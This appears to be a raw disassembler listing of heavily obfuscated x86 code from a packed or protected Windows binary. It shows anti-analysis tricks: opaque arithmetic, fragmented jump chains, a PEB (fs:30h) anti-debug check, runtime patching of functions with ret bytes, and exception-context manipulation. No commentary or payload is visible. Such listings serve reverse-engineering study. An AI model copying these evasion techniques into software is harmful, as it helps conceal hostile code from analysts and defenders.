; ---------------------------------------------------------------------------
jmp sub_44879B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_458413: ; CODE XREF: ut7h7i2x:0043EB4Fj
; ut7h7i2x:0044F37Dj ...
jz loc_43A1EE
mov eax, large fs:30h
push ecx
push offset sub_4561E9
jmp nullsub_332
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FFB1
loc_45842B: ; CODE XREF: sub_43FFB1:loc_458B49j
and esi, ds:4000FBh
or esi, 0F944E59Ah
add esi, 6CDA226h
call sub_457CB8
; END OF FUNCTION CHUNK FOR sub_43FFB1
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_458442: ; CODE XREF: sub_4544E6-4BCEj
ror eax, 17h
; END OF FUNCTION CHUNK FOR sub_4544E6
; START OF FUNCTION CHUNK FOR sub_446F9A
loc_458445: ; CODE XREF: sub_446F9A+5410j
; sub_446F9A+99D7j ...
jmp loc_453683
; END OF FUNCTION CHUNK FOR sub_446F9A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_45844A: ; CODE XREF: sub_4544E6-11C00j
; sub_446F9A+12DF8j
pop ecx
call sub_457ADE
; END OF FUNCTION CHUNK FOR sub_4544E6
; START OF FUNCTION CHUNK FOR sub_44602A
loc_458450: ; CODE XREF: sub_44602A+3422j
jmp nullsub_333
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444374
loc_458455: ; CODE XREF: sub_444374+AC0Ej
; sub_444374:loc_4546F5j
call sub_453D8B
push 0B43CAA94h
pop edx
rol edx, 4
sub edx, 212E11D6h
xor edx, 5F3A3BB5h
jmp loc_457D47
; END OF FUNCTION CHUNK FOR sub_444374
; ---------------------------------------------------------------------------
loc_458474: ; CODE XREF: ut7h7i2x:loc_440F60j
; ut7h7i2x:00444FA1j
popf
pushf
push edx
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_458477: ; CODE XREF: sub_447CBE:loc_444F8Bj
add ebx, 0AE3715D7h
xor ebx, 0F0D02106h
jmp loc_45411C
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
loc_458488: ; CODE XREF: ut7h7i2x:loc_45456Dj
call sub_444E04
mov eax, 0D59435E2h
call sub_43AA94
mov ds:off_41D070, eax
lea eax, sub_44978D
mov byte ptr [eax], 0C3h
jmp sub_44978D
; ---------------------------------------------------------------------------
loc_4584AB: ; CODE XREF: ut7h7i2x:00447C4Dj
or ebx, 9F93B8C4h
sub esi, eax
loc_4584B3: ; CODE XREF: ut7h7i2x:loc_455F8Dj
push 0C752B2B1h
pop eax
and eax, 0D71830DDh
jmp loc_445B40
; ---------------------------------------------------------------------------
cmp esi, eax
jmp loc_455350
; ---------------------------------------------------------------------------
loc_4584CB: ; CODE XREF: ut7h7i2x:004415E6j
jnz loc_4397DD
jmp loc_43F498
; =============== S U B R O U T I N E =======================================
sub_4584D6 proc near ; CODE XREF: ut7h7i2x:00449B47j
; ut7h7i2x:0045895Fp
; FUNCTION CHUNK AT 00455368 SIZE 00000005 BYTES
xchg esi, [esp+0]
pop esi
call sub_453D8B
mov edx, 63180CAFh
call sub_44ED9F
call sub_453D8B
push offset sub_452303
jmp loc_455368
sub_4584D6 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4584F8: ; CODE XREF: ut7h7i2x:0043992Cj
jns loc_454616
; =============== S U B R O U T I N E =======================================
sub_4584FE proc near ; CODE XREF: sub_453A91:loc_458FAFp
; FUNCTION CHUNK AT 00452005 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
rol eax, 16h
jmp loc_452005
sub_4584FE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_45850A: ; CODE XREF: ut7h7i2x:0044E339j
jz loc_43D07E
; START OF FUNCTION CHUNK FOR sub_45A79F
loc_458510: ; CODE XREF: sub_45A79F+14j
jmp loc_452B9F
; END OF FUNCTION CHUNK FOR sub_45A79F
; ---------------------------------------------------------------------------
add edi, 966E55F6h
jmp loc_454147
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B8F8
loc_458520: ; CODE XREF: sub_44B8F8:loc_444E25j
pop edi
; END OF FUNCTION CHUNK FOR sub_44B8F8
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_458521: ; CODE XREF: sub_43AA94+920Fj
; sub_43AA94+D4C1j
xchg eax, edx
call sub_44ED9F
retn
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4456F4
loc_458528: ; CODE XREF: sub_4456F4-836Aj
jmp loc_445CA6
; END OF FUNCTION CHUNK FOR sub_4456F4
; ---------------------------------------------------------------------------
db 19h, 0D2h, 35h
dword_458530 dd 77E60000h ; DATA XREF: sub_43AA94:loc_443C9Br
; sub_43AA94:loc_447F4Dr
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_458534: ; CODE XREF: sub_455807-1A08j
jmp nullsub_334
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FF0
loc_458539: ; CODE XREF: sub_449FF0+42B5j
jmp nullsub_335
; END OF FUNCTION CHUNK FOR sub_449FF0
; ---------------------------------------------------------------------------
dw 3605h
; ---------------------------------------------------------------------------
loc_458540: ; DATA XREF: sub_43AA94+D1E1o
; ut7h7i2x:00456E0Eo
pop edx
mov ds:0C415274Ah, al
db 66h
xor bh, [eax+8DB191h]
; =============== S U B R O U T I N E =======================================
sub_45854D proc near ; CODE XREF: sub_44A7D2:loc_439889p
; sub_453FFB:loc_439A09p ...
var_C = dword ptr -0Ch
; FUNCTION CHUNK AT 00439CDC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043B9DA SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043D42C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D767 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043DA62 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043E902 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043ED14 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004435BD SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00446611 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CAD7 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044FD25 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00450762 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455CB3 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00455F4C SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004574EA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045A2D8 SIZE 00000013 BYTES
jnz loc_45A2D8
jmp loc_455F4C
sub_45854D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_458558: ; CODE XREF: ut7h7i2x:loc_455F6Fj
mov ds:dword_41D1B8, eax
call sub_44FEF8
; START OF FUNCTION CHUNK FOR sub_44DD39
loc_458563: ; CODE XREF: sub_44DD39+6097j
jmp nullsub_395
; END OF FUNCTION CHUNK FOR sub_44DD39
; ---------------------------------------------------------------------------
add ecx, 0CC420C32h
jmp sub_44B789
; ---------------------------------------------------------------------------
ror ebp, 15h
jmp loc_43DCB2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD32
loc_45857B: ; CODE XREF: sub_43DD32+Ej
and edx, 635FEFEAh
rol edx, 5
add edx, 0B62C054Eh
xchg edx, [esp+0]
jmp loc_43B3B0
; END OF FUNCTION CHUNK FOR sub_43DD32
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_188. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
mov ds:off_41D044, eax
lea eax, loc_447EC6
mov byte ptr [eax], 0C3h
jmp loc_44D362
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449808
loc_4585A7: ; CODE XREF: sub_449808:loc_447EC6j
pop edx
mov eax, [esp+0]
push ebp
mov ebp, edx
xchg ebp, [esp+4+var_4]
jmp loc_440E2E
; END OF FUNCTION CHUNK FOR sub_449808
; =============== S U B R O U T I N E =======================================
sub_4585B6 proc near ; CODE XREF: sub_44064B:loc_44064Fp
; ut7h7i2x:00441324j
arg_0 = dword ptr 4
arg_4 = dword ptr 8
xchg eax, [esp+0]
pop eax
loc_4585BA: ; CODE XREF: ut7h7i2x:00455D40j
add eax, [esp-4+arg_0]
adc edx, [esp-4+arg_4]
call sub_4474B1
sub_4585B6 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_44EC11
loc_4585C6: ; CODE XREF: sub_44EC11+11j
jmp loc_43EDB4
; END OF FUNCTION CHUNK FOR sub_44EC11
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4543E9
loc_4585CB: ; CODE XREF: sub_4543E9-115BCj
jmp loc_44608B
; END OF FUNCTION CHUNK FOR sub_4543E9
; ---------------------------------------------------------------------------
loc_4585D0: ; CODE XREF: ut7h7i2x:004484BCj
xor edx, ebx
push eax
pushf
push 46ECE765h
pop eax
and eax, 0B46C7987h
xor eax, 482B05B5h
jmp loc_439293
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_337. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459DE7
loc_4585EC: ; CODE XREF: sub_459DE7-EAD6j
sub ebp, ecx
jmp loc_44ECCE
; END OF FUNCTION CHUNK FOR sub_459DE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444EAA
loc_4585F3: ; CODE XREF: sub_444EAA:loc_442EEBj
xor edx, 4366E4F0h
sub edx, 378A03B8h
rol edx, 3
xor edx, 4205B9C3h
loc_458608: ; CODE XREF: sub_452814-10996j
; sub_43F071+11657j
add edx, ebp
add edx, 0E33C4FDAh
mov [edx], al
pop edx
jmp loc_44A30A
; END OF FUNCTION CHUNK FOR sub_444EAA
; ---------------------------------------------------------------------------
loc_458618: ; DATA XREF: sub_43F7B6:loc_43CFA6o
cmp byte ptr [eax], 0
jnz loc_44FA31
mov eax, [ebp-8]
push offset loc_43A35C
jmp locret_454150
; ---------------------------------------------------------------------------
test eax, eax
jz loc_45A36B
jmp loc_43C914
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A070
loc_45863B: ; CODE XREF: sub_45A070+10j
push 0AFEEC616h
pop eax
rol eax, 0Fh
test eax, 8000h
jmp loc_446755
; END OF FUNCTION CHUNK FOR sub_45A070
; =============== S U B R O U T I N E =======================================
sub_45864F proc near ; DATA XREF: sub_44CAB9+CA5Ao
add edi, 8386D322h
mov [edi], eax
pop edi
lea eax, nullsub_418
mov byte ptr [eax], 0C3h
jmp nullsub_418
sub_45864F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_458666: ; CODE XREF: ut7h7i2x:0044AC94j
call sub_43D364
loc_45866B: ; CODE XREF: ut7h7i2x:loc_446829j
call sub_452E7F
mov eax, 4AC5B528h
call sub_43AA94
mov ds:dword_41D080, eax
lea eax, nullsub_113
mov byte ptr [eax], 0C3h
jmp loc_458F1D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4390DE
loc_45868E: ; CODE XREF: sub_4390DE+Fj
xchg ebx, [esp+4+var_4]
mov eax, ebx
pop ebx
rol eax, 10h
sub eax, 0A193F8B2h
and eax, ds:4000F5h
jmp loc_45120E
; END OF FUNCTION CHUNK FOR sub_4390DE
; =============== S U B R O U T I N E =======================================
sub_4586A8 proc near ; CODE XREF: ut7h7i2x:0043CA20j
; sub_456F1D-4419p
; FUNCTION CHUNK AT 0044ACED SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044AE9C SIZE 00000011 BYTES
xchg esi, [esp+0]
pop esi
push 0BF194965h
pop eax
or eax, 0FBF664AEh
jmp loc_44AE9C
sub_4586A8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440FC3
loc_4586BD: ; CODE XREF: sub_440FC3+10j
add edx, 8C7B9054h
xchg edx, [esp-4+arg_0]
jmp loc_4530B3
; END OF FUNCTION CHUNK FOR sub_440FC3
; =============== S U B R O U T I N E =======================================
sub_4586CB proc near ; CODE XREF: sub_44A3D6+Ap
; ut7h7i2x:004517BDj
xchg eax, [esp+0]
pop eax
add eax, ebp
call sub_44AF4C
sub_4586CB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4586D6 proc near ; CODE XREF: sub_444DE9+5DE4j
; FUNCTION CHUNK AT 004467B5 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00450982 SIZE 00000005 BYTES
push ebx
push 0DE379CE8h
pop ebx
xor ebx, 0D030511Eh
or ebx, 92FF71B5h
jmp loc_4467B5
sub_4586D6 endp
; ---------------------------------------------------------------------------
loc_4586EE: ; CODE XREF: ut7h7i2x:loc_43E77Bj
jnz loc_4511E0
loc_4586F4: ; CODE XREF: ut7h7i2x:0044C802j
jmp loc_440B7C
; ---------------------------------------------------------------------------
and edi, 0EE72E1E6h
mov edi, 4FEC5D12h
sub edi, 0E1BB28D1h
sbb ebp, 63F5C7C4h
jmp loc_4511DB
; ---------------------------------------------------------------------------
loc_458715: ; DATA XREF: sub_444EAA+10FA0o
push 892816BFh
pop edx
and edx, 52220D43h
sub edx, 498E3AFBh
test edx, 2000000h
jmp loc_442FD8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452950
loc_458732: ; CODE XREF: sub_452950:loc_43E3D9j
push offset loc_43BD3A
jmp loc_43FF16
; END OF FUNCTION CHUNK FOR sub_452950
; ---------------------------------------------------------------------------
loc_45873C: ; CODE XREF: ut7h7i2x:0045AC7Dj
push edx
pushf
push 29A610D8h
pop edx
and edx, 0ADD47542h
jmp loc_43D1BD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_264. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EDD8
loc_458750: ; CODE XREF: sub_43EDD8+8D45j
jmp loc_45665B
; END OF FUNCTION CHUNK FOR sub_43EDD8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CA4
loc_458755: ; CODE XREF: sub_458CA4-15CD6j
jmp loc_44D8B1
; END OF FUNCTION CHUNK FOR sub_458CA4
; ---------------------------------------------------------------------------
loc_45875A: ; CODE XREF: ut7h7i2x:0045092Ej
mov esi, [eax]
jmp loc_43A8C1
; ---------------------------------------------------------------------------
test eax, eax
call sub_44E8F3
; START OF FUNCTION CHUNK FOR sub_444273
loc_458768: ; CODE XREF: sub_444273:loc_44C935j
jmp loc_43D16F
; END OF FUNCTION CHUNK FOR sub_444273
; ---------------------------------------------------------------------------
loc_45876D: ; CODE XREF: ut7h7i2x:00449F34j
pop edx
sub edx, ds:4000F7h
and edx, 2F8CC83Fh
call sub_44E7D4
; START OF FUNCTION CHUNK FOR sub_452AE2
loc_45877F: ; CODE XREF: sub_452AE2+3952j
jmp loc_443FDC
; END OF FUNCTION CHUNK FOR sub_452AE2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_458784: ; CODE XREF: sub_43A556+12B7Fj
jmp nullsub_376
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_458789: ; CODE XREF: sub_439D5C-7D8j
jmp loc_43D697
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_45878E: ; CODE XREF: sub_4489DF:loc_43D276j
call sub_43AED9
push ecx
push 0C9F38F64h
pop ecx
or ecx, 2DC21D7Fh
jnz loc_44F12B
loc_4587A6: ; CODE XREF: sub_441EC6:loc_44239Fj
push esi
push 0F48E6C87h
pop esi
sub esi, 635ABA00h
js loc_43A7F1
; END OF FUNCTION CHUNK FOR sub_4489DF
; START OF FUNCTION CHUNK FOR sub_441C6B
loc_4587B9: ; CODE XREF: sub_441C6B+14889j
jmp loc_43CA81
; END OF FUNCTION CHUNK FOR sub_441C6B
; ---------------------------------------------------------------------------
dw 0C281h
dd 9F46C48Ch, 0FE2022E9h, 3A64BDFFh, 0DBE99BE0h
; ---------------------------------------------------------------------------
imul edi, esi, -1
loc_4587D3: ; DATA XREF: sub_44B5CF-115Fo
ror eax, 1Bh
mov ds:dword_43AF90, eax
retn
; =============== S U B R O U T I N E =======================================
sub_4587DD proc near ; CODE XREF: sub_44941C:loc_43B165p
; sub_44B5CF:loc_43DB3Ep ...
; FUNCTION CHUNK AT 0043FFA7 SIZE 0000000A BYTES
jno sub_44DBA5
push ebp
jmp loc_43FFA7
sub_4587DD endp
; =============== S U B R O U T I N E =======================================
sub_4587E9 proc near ; CODE XREF: ut7h7i2x:0043B131j
; sub_4545B1+10p
xchg edx, [esp+0]
pop edx
mov [ebx], eax
pop ebx
jmp loc_4595FE
sub_4587E9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44386D
loc_4587F5: ; CODE XREF: sub_44386D+6j
add eax, 4F686E17h
mov eax, [eax]
mov eax, [eax]
shl eax, 3
jmp loc_44E4DD
; END OF FUNCTION CHUNK FOR sub_44386D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FA51
loc_458807: ; CODE XREF: sub_44FA51:loc_444842j
mov dword ptr [ecx], 10001h
lea eax, loc_4477F3
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_44FA51
; ---------------------------------------------------------------------------
loc_45881D: ; CODE XREF: ut7h7i2x:00444A2Bj
; ut7h7i2x:0044F1D8j
jmp loc_4425B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FA51
loc_458822: ; CODE XREF: sub_44FA51j
call sub_446599
jmp loc_44453B
; END OF FUNCTION CHUNK FOR sub_44FA51
; ---------------------------------------------------------------------------
loc_45882C: ; DATA XREF: sub_458389:loc_455073o
xchg esi, [esp]
jmp sub_444E04
; ---------------------------------------------------------------------------
loc_458834: ; CODE XREF: ut7h7i2x:0044E07Ej
jp loc_452F2F
; =============== S U B R O U T I N E =======================================
sub_45883A proc near ; CODE XREF: sub_43FF65:loc_43CD1Fp
xchg edi, [esp+0]
pop edi
add eax, 834FC1B0h
mov dword ptr [eax], 594C4C4Fh
lea eax, [ebp-1Ch]
mov dword ptr [eax], offset dword_474244
jmp loc_43A55B
sub_45883A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457453
loc_458858: ; CODE XREF: sub_457453+226Cj
jz loc_43F379
jmp loc_442FF3
; END OF FUNCTION CHUNK FOR sub_457453
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DCFF
loc_458863: ; CODE XREF: sub_43DCFF+F33Aj
pop eax
add eax, 0BB1FA013h
or eax, 2346D77Fh
jns loc_446E42
xor eax, 4061D0AAh
jmp loc_444289
; END OF FUNCTION CHUNK FOR sub_43DCFF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_399. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_458882: ; CODE XREF: ut7h7i2x:0045389Aj
jmp loc_43A750
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_458887: ; CODE XREF: sub_447EB5-A8E0j
jmp loc_458110
; END OF FUNCTION CHUNK FOR sub_447EB5
; ---------------------------------------------------------------------------
mov ds:dword_41D0BC, eax
lea eax, nullsub_9
mov byte ptr [eax], 0C3h
jmp nullsub_9
; ---------------------------------------------------------------------------
push esi
push 8822D17Ch
pop esi
jmp loc_442955
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_507. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441765
loc_4588AD: ; CODE XREF: sub_441765+1B31j
jmp loc_4403CC
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_4588B2: ; CODE XREF: sub_439AE7:loc_44AF40j
mov byte ptr [eax], 0C3h
jmp sub_457EF4
; END OF FUNCTION CHUNK FOR sub_439AE7
; =============== S U B R O U T I N E =======================================
sub_4588BA proc near ; CODE XREF: sub_408DFD+4Bp
; sub_40E422+29Cp ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 00442600 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445F86 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044887E SIZE 00000005 BYTES
push edx
push 89EBBAEEh
xchg esi, [esp+8+var_8]
mov edx, esi
pop esi
and edx, 35FE3153h
jmp loc_44887E
sub_4588BA endp
; =============== S U B R O U T I N E =======================================
sub_4588D1 proc near ; DATA XREF: sub_4565B2:loc_45AC2Eo
; FUNCTION CHUNK AT 00456805 SIZE 0000000D BYTES
add ecx, ebp
add ecx, 0AF36E510h
mov [ecx], eax
pop ecx
mov eax, [ebp-10h]
mov edx, eax
jmp loc_456805
sub_4588D1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_4588E6: ; CODE XREF: sub_43A513+D4Bj
jz loc_450E6F
jmp loc_45985C
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
loc_4588F1: ; CODE XREF: ut7h7i2x:loc_43ADFEj
jnz loc_455E61
jmp loc_44942C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_4588FC: ; CODE XREF: sub_447CBE:loc_4462A5j
xchg ebx, [esp+4+var_4]
jmp sub_45854D
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
jmp ds:off_41D1F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_45890A: ; CODE XREF: ut7h7i2x:0043D489j
; sub_4524FE-7817j
jmp loc_44A688
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4448D7
loc_45890F: ; CODE XREF: sub_4448D7:loc_43ACA6j
; ut7h7i2x:loc_443245j ...
pop edx
jz loc_44FF8C
mov eax, [esp-4+arg_0]
push esi
jmp loc_43BCFA
; END OF FUNCTION CHUNK FOR sub_4448D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_45891F: ; CODE XREF: sub_446320:loc_43AF65j
sbb edi, 1CC69BC3h
not eax
jmp loc_44DA8E
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
locret_45892C: ; CODE XREF: ut7h7i2x:0043A896j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455AD6
loc_45892D: ; CODE XREF: sub_455AD6+19j
jmp loc_43D5A3
; END OF FUNCTION CHUNK FOR sub_455AD6
; ---------------------------------------------------------------------------
loc_458932: ; CODE XREF: ut7h7i2x:00443E7Bj
jmp loc_44CA61
; =============== S U B R O U T I N E =======================================
sub_458937 proc near ; CODE XREF: sub_453E26:loc_446F0Ap
; ut7h7i2x:00451580j ...
; FUNCTION CHUNK AT 00449317 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00459DC8 SIZE 0000000E BYTES
xchg esi, [esp+0]
pop esi
push eax
mov eax, ecx
jmp loc_449317
sub_458937 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B45E
loc_458943: ; CODE XREF: sub_44B45E+3FD2j
jz loc_43DE56
jmp loc_4411D2
; END OF FUNCTION CHUNK FOR sub_44B45E
; ---------------------------------------------------------------------------
loc_45894E: ; CODE XREF: ut7h7i2x:loc_441DB6j
sub edx, 5A417AC2h
add edx, 0A69077C9h
call sub_44ED9F
call sub_4584D6
; START OF FUNCTION CHUNK FOR sub_459D1C
loc_458964: ; CODE XREF: sub_459D1C+5j
jmp nullsub_407
; END OF FUNCTION CHUNK FOR sub_459D1C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_458969: ; CODE XREF: sub_45967C+Bj
xor edi, 0BDDE6526h
rol edi, 15h
add edi, 91BFE04Fh
popf
loc_458979: ; CODE XREF: sub_43DBEC:loc_4424AAj
sub eax, edi
pop edi
push esi
jmp loc_4528F0
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4565B2
loc_458982: ; CODE XREF: sub_4565B2:loc_450C4Fj
adc eax, edi
jmp loc_44E6E7
; END OF FUNCTION CHUNK FOR sub_4565B2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_46. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_45898A: ; CODE XREF: ut7h7i2x:0044FA8Fj
pop ecx
xchg eax, [esp]
shl ebx, 1Fh
jmp loc_43D0AC
; ---------------------------------------------------------------------------
sub eax, ebp
jmp sub_455DE7
; ---------------------------------------------------------------------------
loc_45899D: ; CODE XREF: ut7h7i2x:00445ABAj
test ecx, edi
jmp loc_43D818
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448503
loc_4589A4: ; CODE XREF: sub_448503:loc_441BF4j
add ebx, 0CBF470EDh
and ebx, 0B2F0C43Ch
sub ebx, 0DCA9C8D1h
push offset sub_445A99
jmp loc_44C7E4
; END OF FUNCTION CHUNK FOR sub_448503
; ---------------------------------------------------------------------------
loc_4589C0: ; CODE XREF: ut7h7i2x:00457683j
cdq
; START OF FUNCTION CHUNK FOR sub_44EE57
loc_4589C1: ; CODE XREF: sub_44EE57-5193j
call sub_43E6CC
; END OF FUNCTION CHUNK FOR sub_44EE57
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_63. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4589C7 proc near ; DATA XREF: ut7h7i2x:00453CA9o
; FUNCTION CHUNK AT 004391C0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E9DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FC12 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00443E49 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445FBF SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004517F9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459D41 SIZE 00000015 BYTES
and eax, edx
push 45431129h
pop edx
xor edx, 7E7092EDh
test edx, 4000000h
jmp loc_43E9DD
sub_4589C7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4589E0 proc near ; CODE XREF: ut7h7i2x:0043BA49j
; sub_44B526:loc_4411EEp
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0043D86D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043DE03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EF55 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00442A03 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00443ADF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00444BE8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00444F80 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044BE31 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C3E2 SIZE 00000005 BYTES
xchg edi, [esp-8+arg_4]
pop edi
add eax, 18h
mov [ebp-10h], eax
call sub_440F8E
loc_4589EF: ; CODE XREF: sub_457A66-E39Cj
jmp loc_444BE8
sub_4589E0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
call sub_444FDD
; START OF FUNCTION CHUNK FOR sub_439431
loc_4589F9: ; CODE XREF: sub_439431+6062j
jmp nullsub_349
; END OF FUNCTION CHUNK FOR sub_439431
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4589FE proc near ; CODE XREF: ut7h7i2x:loc_439E41j
; sub_43C184+9j ...
; FUNCTION CHUNK AT 0043CAC6 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043D85D SIZE 00000005 BYTES
push ebp
loc_4589FF: ; CODE XREF: sub_45500F-1B681j
mov ebp, esp
push ecx
push edx
push 0F971FF14h
pop edx
loc_458A09: ; CODE XREF: sub_4544E6-70FAj
jmp loc_43D85D
sub_4589FE endp
; ---------------------------------------------------------------------------
push ebx
push 0E3748E2Ah
pop ebx
or ebx, 0A84E401h
add ebx, 144FF7FBh
xchg ebx, [esp]
jmp sub_453D8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4523CA
loc_458A29: ; CODE XREF: sub_4523CA+19j
add eax, esi
pop esi
mov eax, [eax]
add eax, [ebp-4]
jmp loc_44D092
; END OF FUNCTION CHUNK FOR sub_4523CA
; ---------------------------------------------------------------------------
loc_458A36: ; CODE XREF: ut7h7i2x:0044B951j
xchg ecx, [eax]
or edi, 95C6FC23h
rol ecx, 1Fh
loc_458A41: ; CODE XREF: ut7h7i2x:loc_439F0Bj
push 0FAE2967Dh
jmp loc_443403
; ---------------------------------------------------------------------------
loc_458A4B: ; DATA XREF: sub_44DA3B+4o
mov esp, ebp
xchg edi, [esp]
mov ebp, edi
pop edi
mov eax, ds:dword_44A87C
or eax, eax
